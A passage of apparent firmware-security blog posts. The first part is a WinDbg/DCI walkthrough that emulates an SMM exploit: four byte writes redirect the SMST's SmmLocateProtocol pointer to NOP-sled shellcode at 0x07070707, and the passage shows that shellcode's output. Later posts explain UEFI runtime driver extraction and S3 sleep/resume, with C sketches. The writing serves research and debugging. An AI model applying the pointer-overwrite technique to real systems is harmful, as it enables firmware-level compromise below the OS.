The exploit adds 0xd0 to the address of SMST since its layout is known. As shown below, the offset 0xd0 is the function pointer SmmLocateProtocol.

----
0: kd> db 0`887f9730 l10
00000000`887f9730 53 4d 53 54 00 00 00 00-1e 00 01 00 18 00 00 00 SMST............

0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730
   +0x000 Hdr : EFI_TABLE_HEADER
   +0x018 SmmFirmwareVendor : (null) 
   +0x020 SmmFirmwareRevision : 0
   +0x028 SmmInstallConfigurationTable : 0x00000000`887fa1b0 Void
   +0x030 SmmIo : EFI_SMM_CPU_IO2_PROTOCOL
   +0x050 SmmAllocatePool : 0x00000000`887fb61c Void
   +0x058 SmmFreePool : 0x00000000`887fb744 Void
   +0x060 SmmAllocatePages : 0x00000000`887fbd20 Void
   +0x068 SmmFreePages : 0x00000000`887fbe30 Void
   +0x070 SmmStartupThisAp : 0x00000000`887e0af0 Void
   +0x078 CurrentlyExecutingCpu : 0
   +0x080 NumberOfCpus : 4
   +0x088 CpuSaveStateSize : 0x00000000`887ddd50 -> 0x400
   +0x090 CpuSaveState : 0x00000000`887ddf50 -> 0x00000000`887dac00 Void
   +0x098 NumberOfTableEntries : 6
   +0x0a0 SmmConfigurationTable : 0x00000000`887e5810 Void
   +0x0a8 SmmInstallProtocolInterface : 0x00000000`887fb928 Void
   +0x0b0 SmmUninstallProtocolInterface : 0x00000000`887fbaf4 Void
   +0x0b8 SmmHandleProtocol : 0x00000000`887fbc1c Void
   +0x0c0 SmmRegisterProtocolNotify : 0x00000000`887fbf2c Void
   +0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void
   +0x0d0 SmmLocateProtocol : 0x00000000`887f9f8c Void
   +0x0d8 SmiManage : 0x00000000`887fb2fc Void
   +0x0e0 SmiHandlerRegister : 0x00000000`887fb3d4 Void
   +0x0e8 SmiHandlerUnRegister : 0x00000000`887fb48c Void

----

So, on a vulnerable system, the SMI 0x40 handler would overwrite the contents of the SmmLocateProtocol field.

Since the code we are debugging is no longer vulnerable, let us emulate successful exploitation by changing the RIP to the MOV instruction. After stepping through the instruction, we can confirm the contents of the address highlighted in yellow was changed to 0x07.

----
0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`887f9f8c

0: kd> r rip=0`886e5c9e 
0: kd> t


0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`887f9f07

----

After repeating this step 4 times, the pointer is overwritten with 0x07070707, an address outside SMRAM.

----
0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`07070707


0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730
...

   +0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void
   +0x0d0 SmmLocateProtocol : 0x00000000`07070707 Void
   +0x0d8 SmiManage : 0x00000000`887fb2fc Void
...
----
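Why four writes? Each triggered write changes one byte of the little-endian pointer. The original value 0x00000000887f9f8c already has zero upper bytes, so replacing its low four bytes with 0x07 is enough to redirect it below SMRAM. A tiny Python simulation reproduces the values seen above (0x887f9f07 after one write, 0x07070707 after four). The helper is illustrative only.

```python
import struct


def simulate_byte_writes(qword: int, byte_offsets, value: int = 0x07) -> int:
    """Overwrite selected bytes of a little-endian UINT64 and return the result."""
    raw = bytearray(struct.pack("<Q", qword))
    for off in byte_offsets:
        raw[off] = value  # one SMI 0x40 write per byte
    return struct.unpack("<Q", raw)[0]
```

For example, simulate_byte_writes(0x887f9f8c, range(4)) returns 0x07070707, which is where the exploit places its shellcode.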

Let us run the target one more time to verify successful exploitation. The next SMI is 0xdf, which will call SmmLocateProtocol.

----
0: kd> g
Break instruction exception - code 80000003 (first chance)
cb00:00000000`00008000 bb9180662e mov ebx,2E668091h

0: kd> r
rax=00000000000000df rbx=0000000000000000 rcx=fffff8064d544180
rdx=ffffed842b8400b2 rsi=ffff808cd68ff000 rdi=ffff808cd521e7c0
rip=0000000000008000 rsp=000000002b8476e0 rbp=0000000000000000
r8=0000000000000001 r9=ffff808cd7345040 r10=6c6c656873204d4d
r11=ffff808ccc4901e8 r12=ffffffff80002b6c r13=0000000000000002
r14=fffff8064d8652f8 r15=ffff808cd68ff000
...


0: kd> uf 07070707
00000000`07070707 90              nop
00000000`07070708 90              nop
00000000`07070709 90              nop
00000000`0707070a 90              nop
00000000`0707070b 90              nop
00000000`0707070c 90              nop
00000000`0707070d 90              nop
00000000`0707070e 90              nop
00000000`0707070f 90              nop
00000000`07070710 4c89442418      mov     qword ptr [rsp+18h],r8
00000000`07070715 4889542410      mov     qword ptr [rsp+10h],rdx
00000000`0707071a 48894c2408      mov     qword ptr [rsp+8],rcx
00000000`0707071f 4883ec28        sub     rsp,28h
00000000`07070723 48c744240800000000 mov   qword ptr [rsp+8],0
00000000`0707072c b99e000000      mov     ecx,9Eh
00000000`07070731 0f32            rdmsr

0: kd> bp 0`07070707 
0: kd> g
Breakpoint 0 hit
0038:00000000`07070707 90 nop
----

🎉 As expected, the target breaks into the debugger at 0x07070707. Once the shellcode is executed, its output stored at 0x0 can be checked.

----
0: kd> dx *(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0
*(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0 [Type: HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK]
    [+0x000] Untouched        : 0x1588748418 [Type: unsigned __int64]
    [+0x008] Smbase           : 0x887cb000 [Type: unsigned __int64]
    [+0x010] SmmFeatureControl : 0x1 [Type: unsigned __int64]
    [+0x018] SmmMcaCap        : 0xc00000000000000 [Type: unsigned __int64]
    [+0x020] Eptp             : 0x0 [Type: unsigned __int64]
    [+0x028] HvPatchedAddress : 0x0 [Type: unsigned __int64]
----

Hopefully, you find the combination of DCI and Windbg interesting.

Resources 

Tips for general debugging with DCI

  • Make the target system single-core with bcdedit. I found debugging multi-core configurations unusably unstable.
  • Fully disable Hyper-V on the target before debugging. Hyper-V will crash the system with a synthetic watchdog bugcheck, even if VBS is disabled.
  • DCI offers break-on-VM-exit/entry, but I could never make it work. Do not waste time on it, but do let me know if it works for you.

Tips and references for reverse engineering SMM with DCI

  • Neither Windbg nor Intel System Debugger correctly displays 16-bit mode code at the beginning of SMM. Just continue single stepping until around offset 0x90.

Others

Acknowledgement 

  • Researchers who published their work around DCI/SMM, in particular, Dmytro Oleksiuk (@d_olex) and Mark Ermolov (@_markel___)

Thursday, December 24, 2020

Experiment in extracting runtime drivers on Windows

This post explains the concept of UEFI runtime drivers, how they interact with OS, and an experimental attempt to extract them.

Here are the quick takeaways from this article.

  • UEFI runtime drivers are part of the firmware and run with ring-0 privilege, starting before the OS does.
  • They provide interfaces to some firmware-dependent features, called runtime services, to OS. 
  • Windows saves the addresses of those runtime services into HalEfiRuntimeServicesBlock
  • The base addresses of runtime drivers can be located from the contents of HalEfiRuntimeServicesBlock, but it is difficult to safely find HalEfiRuntimeServicesBlock and the base addresses.
  • Dumping the runtime drivers is useful for diagnosing issues with them, but the HalEfiRuntimeServicesBlock-based approach is fundamentally limited to drivers that implement runtime services.
Happy holidays?


What are UEFI runtime drivers?

Any retail x86_64 PC has UEFI-based system firmware these days, and such firmware must implement some modules that reside in memory from system startup to shutdown. Those modules are called UEFI "runtime drivers" and are meant to provide an operating system (OS) with interfaces to certain firmware-implemented services, as specified by the UEFI specification.

For example, UEFI defines ResetSystem() as one such interface and requires OEMs to ship firmware containing a runtime driver that implements it. Taking my ASUS laptop as an example, ResetSystem() is implemented in a runtime driver called SBRun.

These interfaces are called "runtime services", and 14 of them are defined. One can find the C representation of their definitions in EDK2:
///
/// EFI Runtime Services Table.
///
typedef struct {
  ///
  /// The table header for the EFI Runtime Services Table.
  ///
  EFI_TABLE_HEADER                Hdr;

  //
  // Time Services
  //
  EFI_GET_TIME                    GetTime;
  EFI_SET_TIME                    SetTime;
  EFI_GET_WAKEUP_TIME             GetWakeupTime;
  EFI_SET_WAKEUP_TIME             SetWakeupTime;

  //
  // Virtual Memory Services
  //
  EFI_SET_VIRTUAL_ADDRESS_MAP     SetVirtualAddressMap;
  EFI_CONVERT_POINTER             ConvertPointer;

  //
  // Variable Services
  //
  EFI_GET_VARIABLE                GetVariable;
  EFI_GET_NEXT_VARIABLE_NAME      GetNextVariableName;
  EFI_SET_VARIABLE                SetVariable;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_HIGH_MONO_COUNT    GetNextHighMonotonicCount;
  EFI_RESET_SYSTEM                ResetSystem;

  //
  // UEFI 2.0 Capsule Services
  //
  EFI_UPDATE_CAPSULE              UpdateCapsule;
  EFI_QUERY_CAPSULE_CAPABILITIES  QueryCapsuleCapabilities;

  //
  // Miscellaneous UEFI 2.0 Service
  //
  EFI_QUERY_VARIABLE_INFO         QueryVariableInfo;
} EFI_RUNTIME_SERVICES;
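The Hdr field begins with a 64-bit signature, EFI_RUNTIME_SERVICES_SIGNATURE, which spells "RUNTSERV" in memory. The sketch below shows how a candidate location might be checked against it. It assumes the bytes were already copied from an x64 system, and that HeaderSize is at least the size of the 14-pointer table above (EDK2 sets it to sizeof(EFI_RUNTIME_SERVICES)); the function and macro names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* SIGNATURE_64('R','U','N','T','S','E','R','V') as defined by EDK2. */
#define EFI_RUNTIME_SERVICES_SIGNATURE 0x56524553544E5552ULL

/* Mirrors EFI_TABLE_HEADER from the UEFI specification (24 bytes). */
typedef struct {
    uint64_t Signature;
    uint32_t Revision;
    uint32_t HeaderSize;
    uint32_t CRC32;
    uint32_t Reserved;
} EFI_TABLE_HEADER;

/* Hypothetical: table size on x64, the header plus 14 function pointers. */
#define RUNTIME_SERVICES_SIZE_X64 (sizeof(EFI_TABLE_HEADER) + 14 * sizeof(uint64_t))

/* Returns true if `p` plausibly starts an EFI_RUNTIME_SERVICES table. */
bool looks_like_runtime_services(const uint8_t *p, size_t len)
{
    EFI_TABLE_HEADER hdr;

    assert(p != NULL);
    if (len < RUNTIME_SERVICES_SIZE_X64) {
        return false;
    }
    memcpy(&hdr, p, sizeof(hdr)); /* copy to avoid unaligned access */
    return hdr.Signature == EFI_RUNTIME_SERVICES_SIGNATURE &&
           hdr.HeaderSize >= RUNTIME_SERVICES_SIZE_X64;
}
```

A signature match alone is only a hint; the 14 pointers that follow should also point into plausible runtime driver memory before the candidate is trusted.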

Why do we care?

Runtime drivers have some interesting characteristics:
  • They start before the OS is loaded and can influence the boot process
  • They run with the ring-0 privilege
  • They are called during normal OS execution through the runtime services
  • They are not listed by any widely known monitoring tools or debuggers (unlike device drivers) on Windows
  • They can be developed by anyone and be loaded as long as Secure Boot is disabled
  • They may not exist as files in storage that is accessible from the OS
Because of the lack of visibility into them and access to their files, diagnosing issues with them can be more challenging than diagnosing issues with OS kernel modules. For example, to reverse engineer runtime driver code, you first have to find the runtime drivers in memory and extract them to a file, instead of grabbing a file from the disk.

The other reason is that runtime drivers have gained popularity in the reverse engineering community and are used more and more widely in ways that break standard OS/system integrity. For example, the owner of the system may install a 3rd party runtime driver that overrides the runtime services provided by OEM firmware, to have a "backdoor" for reverse engineering. EfiGuard and efi-memory are examples of those. While that is exactly the owner's intention, some software may still want to detect this and be aware that system integrity might have been tampered with.

How can we find runtime drivers on Windows?

Unfortunately, there is no documented interface to locate runtime drivers in the Windows kernel. However, there are a few implementation details that can be abused for it, for example:
  • The addresses of some runtime services are stored in HalEfiRuntimeServicesBlock
  • There is an EFI_RUNTIME_SERVICES global variable, which contains pointers to the runtime services as seen above, has a distinctive RUNTSERV signature, and is memory resident
  • Runtime drivers are also memory resident, mapped in a certain contiguous physical and virtual memory range, and start with a DOS header at 4KB-aligned addresses
  • Physical memory addresses backing runtime drivers are outside the ranges Windows manages
Based on those facts, one may scan physical or virtual memory for DOS headers and attempt to find all runtime drivers.
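A DOS-header scan could look roughly like the sketch below. It assumes the memory has already been copied into a buffer (reading it safely is the hard part, as the PoC notes show) and checks only the "MZ" magic plus the "PE\0\0" signature that e_lfanew (offset 0x3C) points to. The names find_pe_images and SCAN_PAGE_SIZE are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SCAN_PAGE_SIZE 0x1000u

/* Reads a 32-bit value without an unaligned access (host byte order). */
static uint32_t load_u32(const uint8_t *p)
{
    uint32_t v;
    memcpy(&v, p, sizeof(v));
    return v;
}

/*
 * Scans `mem` at 4KB-aligned offsets for a DOS header whose e_lfanew
 * points at a "PE\0\0" signature inside the buffer. Stores up to `max`
 * matching offsets in `found` and returns how many were stored.
 */
size_t find_pe_images(const uint8_t *mem, size_t len, size_t *found, size_t max)
{
    size_t count = 0;

    assert(mem != NULL && (found != NULL || max == 0));
    for (size_t off = 0; off + 0x40 <= len && count < max; off += SCAN_PAGE_SIZE) {
        if (mem[off] != 'M' || mem[off + 1] != 'Z') {
            continue;
        }
        uint32_t e_lfanew = load_u32(mem + off + 0x3C);
        if (e_lfanew > len - off - 4) {
            continue; /* PE signature would lie outside the buffer */
        }
        if (memcmp(mem + off + e_lfanew, "PE\0\0", 4) == 0) {
            found[count++] = off;
        }
    }
    return count;
}
```

Requiring the PE signature, not just "MZ", filters out pages that merely happen to start with those two bytes.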

The other way, limited (details later) but arguably easier and safer, is to refer to HalEfiRuntimeServicesBlock. HalEfiRuntimeServicesBlock is a Windows-defined structure made up of copies of a handful of runtime service addresses [ref], as shown below.

typedef struct _HAL_RUNTIME_SERVICES_BLOCK
{
    void* GetTime;
    void* SetTime;
    void* ResetSystem;
    void* GetVariable;
    void* GetNextVariableName;
    void* SetVariable;
    void* UpdateCapsule;
    void* QueryCapsuleCapabilities;
    void* QueryVariableInfo;
} HAL_RUNTIME_SERVICES_BLOCK;

Windows initializes this structure during startup and uses it to invoke runtime services (as opposed to directly using the EFI_RUNTIME_SERVICES structure). By locating HalEfiRuntimeServicesBlock, one can find the runtime services' addresses and the runtime drivers implementing them.
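Once a runtime service address is read from HalEfiRuntimeServicesBlock, one plausible way to find the implementing driver's base address is to walk backward page by page until a DOS header appears, relying on the 4KB alignment noted earlier. The sketch below is not kraft_dinner's code: it works on a hypothetical MemoryView copy of memory rather than live kernel memory, so it sidesteps the safe-read problem entirely.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define RT_PAGE_SIZE 0x1000u

/* Hypothetical: `bytes` is a copy of memory starting at virtual address `base`. */
typedef struct {
    uint64_t base;
    const uint8_t *bytes;
    size_t size;
} MemoryView;

/* True if the view contains "MZ" at virtual address `va`. */
static bool has_dos_header(const MemoryView *view, uint64_t va)
{
    if (va < view->base || va - view->base + 2 > view->size) {
        return false;
    }
    const uint8_t *p = view->bytes + (va - view->base);
    return p[0] == 'M' && p[1] == 'Z';
}

/*
 * Walks backward from a runtime service address, one page at a time,
 * until a DOS header is found. Returns the image base, or 0 if none is
 * found within `max_pages` pages or the walk leaves the view.
 */
uint64_t find_image_base(const MemoryView *view, uint64_t service_va, unsigned max_pages)
{
    assert(view != NULL);
    uint64_t va = service_va & ~(uint64_t)(RT_PAGE_SIZE - 1);
    for (unsigned i = 0; i < max_pages; i++) {
        if (has_dos_header(view, va)) {
            return va;
        }
        if (va < view->base + RT_PAGE_SIZE) {
            break; /* the next page would be below the view */
        }
        va -= RT_PAGE_SIZE;
    }
    return 0;
}
```

The `max_pages` bound keeps the walk from running through unrelated memory when a driver has nullified its header.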

PoC and challenges 

I authored a tool implementing this idea, named kraft_dinner. More details can be found in the source code; here are some notable discoveries with this approach.
  • HalEfiRuntimeServicesBlock can be found with HalQuerySystemInformation() only up to 19H2. One has to get creative for newer versions.
  • The physical memory address range backing runtime drivers is not known to Windows and not reported by MmGetPhysicalMemoryRanges(). This can be used to test a probable runtime driver address. 
  • MmCopyMemory() never succeeds in reading memory that backs runtime drivers, regardless of whether virtual or physical memory is specified. This makes implementing a safe search operation harder.
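The MmGetPhysicalMemoryRanges() test can be sketched as follows. That function returns an array of PHYSICAL_MEMORY_RANGE entries terminated by an entry whose BaseAddress and NumberOfBytes are both zero. The sketch uses a simplified, hypothetical PhysRange stand-in so that it compiles outside the WDK.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical stand-in for PHYSICAL_MEMORY_RANGE (which uses
 * PHYSICAL_ADDRESS and LARGE_INTEGER). The array ends with an all-zero entry.
 */
typedef struct {
    uint64_t BaseAddress;
    uint64_t NumberOfBytes;
} PhysRange;

/* True if `pa` is not covered by any range reported as managed by Windows. */
bool is_outside_managed_ranges(const PhysRange *ranges, uint64_t pa)
{
    assert(ranges != NULL);
    for (const PhysRange *r = ranges; r->BaseAddress != 0 || r->NumberOfBytes != 0; r++) {
        if (pa >= r->BaseAddress && pa - r->BaseAddress < r->NumberOfBytes) {
            return false;
        }
    }
    return true;
}
```

A candidate runtime driver address whose backing physical page passes this check is consistent with firmware-owned memory, though it is not proof on its own.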

Limitations

While the HalEfiRuntimeServicesBlock approach works reasonably well, it has some fundamental limitations.

Firstly, runtime drivers that do not implement runtime services are not found. Such runtime drivers do not have any formally defined way to directly influence Windows and system integrity, but may still hook (patch) other code to implement a backdoor instead. umap and voyager are examples of such hacking drivers. A memory scanning-based approach would address this issue.

Secondly, runtime drivers can easily hide from this approach by writing trampoline code at the beginning of the original runtime service instead of replacing the pointer in EFI_RUNTIME_SERVICES, or by nullifying the PE header. Those may be mitigated with more intelligent analysis and dumping, but nullifying the PE header is also an easy countermeasure against memory scanning.

Thirdly, as a general challenge with memory analysis, classifying memory dump files is not straightforward. Because memory contents vary slightly between boots due to relocation (code patches), hash values change each time. Fuzzy hashing such as ssdeep is required to classify dump files and build a useful database. Also, a dump file does not contain the driver's name and GUID as found in the actual firmware.

Finally, this is Windows-specific and hacky. It depends heavily on Windows implementation details, which may break soon. While the PoC worked fine on multiple devices, I would not be comfortable deploying this logic to millions of systems.

So why did I do this?

I encountered a bug in one of the OEM runtime drivers and thought I would tool something quick, but in Rust :)

References

Monday, November 16, 2020

S3 Sleep, Resume and Handling Them with Type-1 Hypervisor

This post explains how the system enters and resumes from S3 (Sleep) on a modern x86-64 system, by reviewing specifications and the implementation of Windows as an example. This post also outlines challenges with S3 for type-1 hypervisors and how to work around it.
Tea in the S3 state

Why S3 is Interesting

On normal system startup, UEFI-based system firmware goes through four execution phases before starting the OS. Those phases include Driver eXecution Environment (DXE), Boot Device Selection (BDS), and Transient System Load (TSL), where system configurations are set and 3rd party firmware modules may be executed. On the S3 resume boot path, on the other hand, those phases are skipped for faster start-up.

This has significant security implications because the S3 resume boot path needs to reapply the same security configurations as those made during the normal boot path, using entirely different code. Failing to do so securely leads to vulnerabilities, for example, unauthorized modification of a system firmware image if a firmware write-protection bit is not reapplied during resume.

Also, a type-1 hypervisor that is loaded during the TSL phase cannot get loaded on resume, because that phase is skipped. Since the processors were shut down on S3, processor-based virtualization features such as Intel VT-x stop working after resume even though the hypervisor module remains mapped in memory. This needs to be handled.

High-Level Flow

Before diving into details, let us review the high-level flow of S3 sleep and resume. The following are the highlights.
  1. Setting certain bits in the Power Management (PM) 1 Control registers, PM1a_CNT_BLK / PM1b_CNT_BLK, puts the system into the S3 state.
  2. During the next system start-up, system firmware detects that shutdown was because of S3 and executes the S3 resume boot path, instead of the normal boot path.
  3. System firmware executes a collection of commands, called boot scripts, and then the code pointed to by the Firmware Waking Vector in the ACPI table. The latter is called the OS waking vector and is set up by the OS prior to entering S3.
  4. The waking vector resumes execution of the OS.

Entering S3

The platform enters S3 when software sets the SLP_EN bit to 1 and the SLP_TYP bits to 5 (0b101) in the PM1 control registers. The ACPI specification states that setting SLP_EN triggers the state transition.
Table 4.13: PM1 Control Registers Fixed Hardware Feature Control, from the ACPI spec
The explanation of the SLP_TYP bits in the table is not crystal clear, but it becomes more obvious with the specification of an Intel platform. Below is an excerpt from the table under 4.2.2 Power Management 1 Control (PM1_CNT) for one of the hardware models that implement ACPI.
 From Intel 495 Series Chipset Family On-Package Platform Controller Hub volume 2
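Putting the bit positions together (SLP_TYP in bits 10-12, SLP_EN in bit 13, per the ACPI PM1 control register table), the value written for S3 can be computed as below. This is a sketch: the macro and function names are hypothetical, SLP_TYP = 5 is the Intel PCH encoding from the excerpt above, and other bits such as SCI_EN are preserved with a read-modify-write.

```c
#include <assert.h>
#include <stdint.h>

/* PM1 control register fields (ACPI PM1 Control Registers table). */
#define PM1_SLP_TYP_SHIFT 10                          /* bits 10-12 */
#define PM1_SLP_TYP_MASK  (0x7u << PM1_SLP_TYP_SHIFT)
#define PM1_SLP_EN        (1u << 13)

/* SLP_TYP encoding of S3 on the Intel PCH above (0b101). */
#define SLP_TYP_S3_INTEL  5u

/*
 * Given the current PM1 control value, returns the value that requests a
 * transition to sleep type `slp_typ`, keeping all unrelated bits.
 */
uint16_t pm1_sleep_value(uint16_t current, unsigned slp_typ)
{
    assert(slp_typ <= 7);
    uint16_t v = (uint16_t)(current & ~PM1_SLP_TYP_MASK);
    v = (uint16_t)(v | (slp_typ << PM1_SLP_TYP_SHIFT));
    return (uint16_t)(v | PM1_SLP_EN);
}
```

For example, with only SCI_EN set (0x0001), pm1_sleep_value(0x0001, SLP_TYP_S3_INTEL) yields 0x3401. In general, the SLP_TYP value is platform-specific and comes from the \_S3 object in the DSDT rather than being hard-coded.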

Then, where are those registers? ACPI does not define their location but does define the way to locate them. Under 4.8.3 PM1 Control Registers, it states that
Each register block has a unique 32-bit pointer in the Fixed ACPI Table (FADT) to allow the PM1 event bits to be partitioned between two chips.
Below are excerpts of the FADT format, which contains multiple fields indicating where the registers are.
...
...
Depending on the implementation of ACPI, some fields may be unused. On my system, the SLEEP_CONTROL_REG field in the table shows that the register is located at I/O port 0x1804.

RWEverything parsing the FACP table on Windows

So far, we learned that: 
  • the system enters the S3 state when software sets the SLP_EN and SLP_TYP bits in the PM1 control register.
  • the PM1 control register can be located through the FADT ACPI table.
Note that ACPI tables themselves can be easily located in platform-specific ways, such as /sys/firmware/acpi on Linux, GetSystemFirmwareTable() on Windows, or EfiLocateFirstAcpiTable() on UEFI.
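Given the raw FADT bytes, the PM1 control register ports and the FACS address can be read at fixed offsets. The sketch below validates the "FACP" signature, length, and checksum, and assumes the legacy 32-bit fields (FIRMWARE_CTRL at offset 36, PM1a_CNT_BLK at 64, PM1b_CNT_BLK at 68) are populated. Newer systems may use the 64-bit X_ fields instead, or SLEEP_CONTROL_REG on hardware-reduced ACPI platforms. FadtInfo and parse_fadt are hypothetical names.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Byte offsets of a few FADT fields per the ACPI specification. */
#define FADT_FIRMWARE_CTRL 36 /* 32-bit physical address of the FACS */
#define FADT_PM1A_CNT_BLK  64 /* 32-bit I/O port of PM1a control */
#define FADT_PM1B_CNT_BLK  68 /* 32-bit I/O port of PM1b control, 0 if unused */

typedef struct {
    uint32_t facs;
    uint32_t pm1a_cnt;
    uint32_t pm1b_cnt;
} FadtInfo;

/* ACPI tables are little-endian. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parses a raw FADT, e.g. the bytes of /sys/firmware/acpi/tables/FACP. */
bool parse_fadt(const uint8_t *table, size_t len, FadtInfo *out)
{
    assert(table != NULL && out != NULL);
    if (len < FADT_PM1B_CNT_BLK + 4 || memcmp(table, "FACP", 4) != 0) {
        return false;
    }
    uint32_t table_len = le32(table + 4); /* Length field of the header */
    if (table_len > len || table_len < FADT_PM1B_CNT_BLK + 4) {
        return false;
    }
    uint8_t sum = 0; /* all bytes of a valid table sum to 0 (mod 256) */
    for (uint32_t i = 0; i < table_len; i++) {
        sum = (uint8_t)(sum + table[i]);
    }
    if (sum != 0) {
        return false;
    }
    out->facs = le32(table + FADT_FIRMWARE_CTRL);
    out->pm1a_cnt = le32(table + FADT_PM1A_CNT_BLK);
    out->pm1b_cnt = le32(table + FADT_PM1B_CNT_BLK);
    return true;
}
```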

Resuming from S3

On system start-up, system firmware executes the same initialization path as the normal boot path, and then diverges when it detects that the previous shutdown was due to entering S3. This resume-specific path is called the S3 resume boot path and is well explained in the UEFI Platform Initialization (PI) specification.

In a nutshell, the S3 resume boot path executes the boot scripts to re-initialize the platform, instead of executing the last three boot phases: DXE, BDS and TSL. The boot scripts are saved in non-volatile storage and replicate the platform configuration made during normal boot. The illustration below from the spec highlights the differences between the normal and S3 resume boot paths, as well as how boot scripts are saved and consumed.
Normal and S3 resume boot paths, from the PI spec
As illustrated, after the boot scripts are executed, an OS waking vector is executed to resume execution of the OS on the S3 resume boot path. The OS waking vector is the very first OS-specific code (code that is developed by the OS vendor and is not part of system firmware). This is typically 16-bit real-mode code that switches the processor to long mode, restores registers to the values they had before the system entered S3, and lets the OS execute further restoration code to fully resume the system. The OS sets up this OS waking vector right before entering S3.

How does the OS set up the OS waking vector, and how does system firmware find its location? Again, ACPI defines the way.

The Firmware ACPI Control Structure (FACS) table defines a field called Firmware Waking Vector. The OS writes the address of the OS waking vector to this field, and system firmware reads it to locate and execute the OS waking vector.
Firmware Waking Vector in FACS, from the ACPI spec

To summarize the flow in the chronological order:
  1. The OS writes the address of the OS waking vector (i.e., bootstrap code) to the Firmware Waking Vector field of the FACS table before entering S3.
  2. System firmware reads the field to know the address of the OS waking vector and transfers execution to the address during the S3 resume boot path.
  3. The OS waking vector eventually resumes system states using configurations kept in memory.
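Both sides of this handshake boil down to a few bytes in the FACS. In the sketch below, the Firmware Waking Vector sits at offset 12 of the FACS; when firmware enters it in real mode, the ACPI spec's own example is that physical address 0x12345 is entered as 0x1234:0x0005. The sketch assumes a 64-byte FACS copy and a little-endian host, uses hypothetical function names, and ignores the 64-bit X_Firmware_Waking_Vector field (offset 24) that ACPI 2.0 and later also define.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define FACS_FIRMWARE_WAKING_VECTOR 12 /* 32-bit field */

/* OS side (step 1): record the waking vector's physical address in the FACS. */
void facs_set_waking_vector(uint8_t *facs, uint32_t waking_vector_pa)
{
    assert(facs != NULL && memcmp(facs, "FACS", 4) == 0);
    /* memcpy stores host byte order, which matches ACPI on x86. */
    memcpy(facs + FACS_FIRMWARE_WAKING_VECTOR, &waking_vector_pa, sizeof(waking_vector_pa));
}

/* Firmware side (step 2): the real-mode CS:IP used to enter the vector. */
void waking_vector_to_cs_ip(uint32_t waking_vector_pa, uint16_t *cs, uint16_t *ip)
{
    assert(waking_vector_pa < 0x100000); /* must be reachable in real mode */
    *cs = (uint16_t)(waking_vector_pa >> 4);
    *ip = (uint16_t)(waking_vector_pa & 0xF);
}
```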

Implementation on Windows and EDK2

Let us look into how what we reviewed above is implemented on Windows (build 18362) and EDK2.
EDK2 is a reference implementation of UEFI, the system firmware specification, and very commonly used as a base of commercial system firmware. 

Entering S3

On Windows, HaliAcpiSleep() is the main function that implements S3 handling and is called on all processors when a user requests entering S3. It roughly does the following, in order.
  1. The bootstrap processor (BSP) sets up the OS waking vector with HalpSetupRealModeResume().
    // HalpWakeVector is the address of the Firmware Waking Vector field in the FACS table, initialized at HaliInitPowerManagement()
    *HalpWakeVector = HalpLowStubPhysicalAddress;
  2. BSP waits for all APs to complete saving their states.
    InterlockedAdd(&HalpFlushBarrier, 1);
    while (HalpFlushBarrier != ProcessorCount);
  3. Application processors (APs) save their registers with HalpSaveProcessorState().
  4. APs enter a loop in HalpFlushAndWait() that never exits on the success path.
    InterlockedIncrement(&HalpFlushBarrier);
    while (HalpFlushBarrier);
  5. BSP writes to the PM1 control register(s) to set the following values with HalpAcpiPmRegisterWrite().
    • SLP_TYP = 5 (S3)
    • SLP_EN = 1 
This puts the system into the S3 state. Let us look into the resume path.

Resuming from S3

  1. On the system firmware (EDK2) side, the execution flow specific to the S3 resume boot path looks roughly like this.
    ...
      -> DxeLoadCore()
           -> S3RestoreConfig2()
                -> S3ResumeExecuteBootScript()
                     -> S3BootScriptExecutorEntryFunction()
  2. S3BootScriptExecutorEntryFunction() executes the boot script and jumps to the OS waking vector as indicated by Facs->FirmwareWakingVector at the end.
  3. The OS waking vector is a copy of HalpRMStub. This eventually brings the BSP's execution to right after HalpSetupRealModeResume() with RAX=1, as if it had returned from the function.
  4. BSP wakes up other APs by sending INIT-SIPI-SIPI.
    // This wakes up all APs with HalStartNextProcessor() calls
    HalpAcpiPostSleep(...);
  5. The INIT-SIPI-SIPI brings the APs to right after HalpSaveProcessorState() with RAX=1, as if it had returned from the function. For more details on how INIT-SIPI-SIPI starts up APs, please read the previous post.
  6. The BSP and all APs call HalpPostSleepMP() to restore other platform states, then return from HaliAcpiSleep(), continuing OS execution as usual.
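Steps 4 and 5 rely on the local APIC's Interrupt Command Register (ICR). The sketch below composes generic xAPIC ICR values for an INIT IPI and a Startup IPI, following the Intel SDM. It does not reflect how HalStartNextProcessor() actually writes them, and the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* xAPIC ICR low-dword fields (Intel SDM Vol. 3). */
#define ICR_DELIVERY_INIT    (0x5u << 8)
#define ICR_DELIVERY_STARTUP (0x6u << 8)
#define ICR_LEVEL_ASSERT     (1u << 14)

/* ICR low value for an INIT IPI to the APIC ID placed in the ICR high dword. */
uint32_t icr_init(void)
{
    return ICR_DELIVERY_INIT | ICR_LEVEL_ASSERT;
}

/*
 * ICR low value for a Startup IPI. The AP starts in real mode at
 * vector * 0x1000, so the start address must be 4KB aligned and below 1MB.
 */
uint32_t icr_sipi(uint32_t start_pa)
{
    assert((start_pa & 0xFFFu) == 0 && start_pa < 0x100000);
    return ICR_DELIVERY_STARTUP | ICR_LEVEL_ASSERT | (start_pa >> 12);
}

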